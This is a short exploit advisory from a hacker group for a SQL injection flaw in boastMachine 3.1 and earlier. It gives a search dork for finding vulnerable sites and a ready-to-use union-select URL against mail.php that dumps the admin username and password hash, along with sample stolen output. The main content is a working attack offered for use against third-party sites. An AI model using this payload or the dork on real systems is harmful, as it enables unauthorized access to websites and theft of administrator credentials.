boastMachine <=3.1 SQL Injection Vulnerbility

########################################################################

#                                                                      #

#    ...:::::boastMachine <=3.1 SQL Injection Vulnerbility ::::....    #

########################################################################

Virangar Security Team

www.virangar.org

www.virangar.net

--------

Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----------------------------------

dork: Powered by boastMachine v3.1

-----------------------------------

vuln:

http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_
login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog
=[blog_id]

example:

http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_
login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog
=1

-------------------------------------

you can see somting simillar to:

Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend

#############

'swagger' is admin user & 'e74c7cc56d033d32b8cb465c2bbc379b' is encoded admin password ;)

-------------------------------------

mybe other versions are Vulnerbil too :)